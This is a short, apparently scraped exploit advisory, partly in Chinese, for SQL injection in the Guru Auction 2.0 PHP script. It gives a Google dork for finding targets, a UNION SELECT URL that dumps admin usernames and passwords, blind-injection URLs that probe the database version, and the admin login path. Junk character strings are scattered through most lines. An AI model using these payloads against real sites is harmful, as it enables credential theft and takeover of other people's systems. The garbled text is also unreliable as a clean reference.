Guru Auction 2.0 Multiple SQL Injection Vulnerabilities5 k0 ^7 y# m* F3 k& l
! r& D) _$ s/ I& U4 u- Y# G
作者 : v3n0m; n/ X$ U9 m. M
应用 : Guru Auction 2.0
|0 G- S- |# qPrice : $494 U# z0 S8 F4 w- M. m D
Vendor : http://www.guruscript.com/
& o( Z) `4 \$ c/ @0 Z& mGoogle Dork : inurl:subcat.php?cate_id=
: E+ A/ I' M( L3 Y. \7 V6 V 8 w# L% Q4 k* e4 H' `4 [9 k" @
SQLi p0c:
. J& R) J$ w- u! x; _, M~~~~~~~~~~8 V4 n' q$ E6 G5 ]/ l$ R
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--9 [6 y* N* h8 ^! s' N
\- L/ ?6 y7 f& G9 T
' E; I& G; f4 F' n( f# R盲注 p0c:* R _) _6 W6 m- C( X6 g
~~~~~~~~~~1 C6 [7 r- } t P& A
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
5 O \5 H; _& T/ ?http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false6 l B: S/ o; L6 a' h/ a- \: z/ M
( D6 S6 w$ d3 g" I3 ~& l) U
管理登录入口:
/ S3 O5 w W- I6 Y8 R- A9 p6 ^: L5 p~~~~~~~~~~4 T3 J. l' [1 C. U4 g, g+ M
http://domain.tld/[path]/admin/+ |9 e8 F ^" }! Z8 ?5 A4 ~
|